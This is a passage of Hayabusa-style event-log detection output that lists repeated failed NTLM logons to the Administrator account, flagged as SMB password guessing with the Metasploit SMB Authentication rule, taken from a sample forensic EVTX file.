Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 